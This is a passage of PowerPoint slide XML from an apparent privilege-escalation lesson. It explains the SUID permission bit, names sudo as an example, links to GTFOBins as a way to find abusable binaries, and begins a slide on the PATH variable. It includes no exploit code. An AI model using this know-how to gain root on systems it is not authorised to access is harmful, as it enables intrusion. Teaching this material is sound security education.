            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with ROOT permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with USER permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why do we want this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240198859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1C88BD24-E967-DA45-8B01-B23FE36A24C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et owner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If this bit is set, the file is executed with the permissions of the OWNER, not the user executing the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with ROOT permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with USER permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why do we want this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some commands need it, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1461211399"/>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1C88BD24-E967-DA45-8B01-B23FE36A24C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et owner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If this bit is set, the file is executed with the permissions of the OWNER, not the user executing the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with ROOT permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with USER permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why do we want this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some commands need it, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How do we know if we can take advantage of something?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178572858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1C88BD24-E967-DA45-8B01-B23FE36A24C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et owner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If this bit is set, the file is executed with the permissions of the OWNER, not the user executing the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with ROOT permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will be ran with USER permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why do we want this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some commands need it, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How do we know if we can take advantage of something?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732178478"/>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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289295434"/>
              </p:ext>
            </p:extLst>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C470D6AE-151F-B24B-A53D-13D6C536ABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B0253-E21C-0B4C-919C-9324CBC903C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1304607682"/>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C470D6AE-151F-B24B-A53D-13D6C536ABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
